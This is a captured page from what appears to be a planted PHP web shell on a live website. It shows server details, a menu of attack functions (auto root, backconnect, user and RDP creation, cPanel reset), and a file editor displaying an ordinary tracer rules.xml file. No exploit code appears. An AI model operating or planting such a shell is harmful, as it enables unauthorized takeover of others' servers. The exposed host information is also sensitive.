Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
tracer /
[ HOME SHELL ]
Name
Size
Permission
Action
README.md
540
B
-rw-r--r--
__init__.py
2
B
-rw-r--r--
applications.xml
5.3
KB
-rw-r--r--
rules.xml
2.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rules.xml
<!-- - rules.xml - Rules definitions for traced applications - - When process is found, tracer looks into this file and searches for its parent rules. - If rule is found, action is performed. These two actions can be done: - * Return the actual process - * Find the rule for parent process - - - Copyright (C) 2016 Jakub Kadlcik - - This copyrighted material is made available to anyone wishing to use, - modify, copy, or redistribute it subject to the terms and conditions of - the GNU General Public License v.2, or (at your option) any later version. - This program is distributed in the hope that it will be useful, but WITHOUT - ANY WARRANTY expressed or implied, including the implied warranties of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General - Public License for more details. You should have received a copy of the - GNU General Public License along with this program; if not, write to the - Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA - 02110-1301, USA. - - - - Rule syntax: - <rule name="app_name" action="some_action" /> - - Default action: - 'call-parent' - - Available actions: - 'call-parent' - Use it for parts of the application (i.e. chrome-sandbox) - 'return' - Use it for the whole application (i.e. chromium) - --> <rules> <rule name="sd-pam" /> <!-- KDE --> <rule name="kwin" action="return" /> <rule name="seapplet" action="return" /> <rule name="akonadiserver" /> <rule name="ksmserver" /> <rule name="akonadi_agent_launcher" /> <rule name="akonadi_archivemail_agent" /> <rule name="akonadi_birthdays_resource" /> <rule name="akonadi_folderarchive_agent" /> <rule name="akonadi_maildispatcher_agent" /> <rule name="akonadi_mailfilter_agent" /> <rule name="akonadi_migration_agent" /> <rule name="akonadi_nepomuk_feeder" /> <rule name="akonadi_newmailnotifier_agent" /> <rule name="akonadi_sendlater_agent" /> <rule name="abrt-applet" /> <!-- MATE --> <rule name="mate-session" /> <!-- Xfce --> <rule name="xfce4-session" /> <rule name="xfce4-terminal" action="return" /> <!-- LXDE --> <rule name="lxsession" /> <rule name="lxdm-binary" action="return"/> <!-- Networking --> <rule name="wicd" action="return" /> <!-- Web browsers --> <rule name="chrome" action="return" /> <rule name="chromium" action="return" /> <rule name="firefox" action="return" /> <rule name="chrome-sandbox" /> <rule name="plugin-container" /> <rule name="pidgin" action="return" /> <rule name="urxvt" action="return" /> <rule name="xmonad-i386-linux" action="return" /> </rules>
Close